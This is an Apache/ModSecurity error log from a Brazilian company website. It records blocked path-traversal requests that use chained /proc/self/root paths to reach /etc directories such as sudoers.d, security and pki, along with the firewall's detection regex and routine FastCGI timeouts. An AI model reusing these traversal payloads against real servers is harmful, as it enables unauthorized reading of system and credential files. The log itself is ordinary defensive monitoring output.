[Wed Mar 18 21:07:19.464125 2026] [:error] [pid 11816:tid 140411649607424] [client 74.7.241.31:48610] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs-N-w_le52K8_3pV0f7QAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 21:07:28.675648 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.241.31:53304] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs-QPu8EFLIOrSqIptDYwAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 21:07:36.137813 2026] [proxy_fcgi:error] [pid 31803:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41014] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:07:36.971914 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.241.31:60584] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs-SAbLMZ6AikZjR9UD4AAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 21:07:41.227537 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.241.31:60214] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs-Tew_le52K8_3pV0f8AAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 21:07:57.078471 2026] [proxy_fcgi:error] [pid 15051:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:41268] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:07:58.148466 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.241.31:60216] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs-XuyqAr6etmhZHNoMxAAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 21:08:09.049870 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.241.31:35742] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs-aeoXxyEfFpUF8f-6YAAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 21:08:20.549635 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:59926] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs-dMdf6f5d65gmYZQZqQAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 21:08:24.137812 2026] [proxy_fcgi:error] [pid 27293:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41722] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:08:47.129813 2026] [proxy_fcgi:error] [pid 9333:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:42082] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:09:12.121336 2026] [proxy_fcgi:error] [pid 29882:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:42480] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:09:41.137858 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:42920] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:10:09.258001 2026] [proxy_fcgi:error] [pid 31803:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:43446] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:10:36.153873 2026] [proxy_fcgi:error] [pid 29882:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:43946] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:11:04.133867 2026] [proxy_fcgi:error] [pid 29882:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:44492] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:11:25.783603 2026] [:error] [pid 27403:tid 140411725141760] [client 74.7.241.31:33508] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_LRkFeYa1D6dYQnCR1wAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:11:29.049986 2026] [proxy_fcgi:error] [pid 29882:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:44976] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:11:29.300895 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.241.31:33292] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_MUzinOy1jxa1j4djjwAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:11:31.025591 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.241.31:46516] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_M0zinOy1jxa1j4djkQAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:11:34.032178 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.241.31:46524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_NkzinOy1jxa1j4djlAAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:11:39.538230 2026] [:error] [pid 15051:tid 140411733534464] [client 74.7.241.31:46530] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_OymAPhZkrhU8w4muowAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:11:44.699570 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.241.31:41582] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_QPu8EFLIOrSqIptDyAAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:11:48.127811 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.241.31:40112] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_REzinOy1jxa1j4djnQAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:11:51.033420 2026] [:error] [pid 27403:tid 140411741927168] [client 74.7.241.31:40120] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_RxkFeYa1D6dYQnCR4AAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:11:51.051259 2026] [proxy_fcgi:error] [pid 31803:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:45442] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:11:53.850097 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.241.31:40128] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_SeyqAr6etmhZHNoM_gAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:11:57.536763 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.241.31:40144] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_TSmAPhZkrhU8w4murwAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:12:00.960494 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.241.31:38308] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_UOoXxyEfFpUF8f-6kwAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:12:03.283697 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:35574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_U8df6f5d65gmYZQZuwAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 21:12:03.518792 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.241.31:38320] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_U-yqAr6etmhZHNoNAgAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
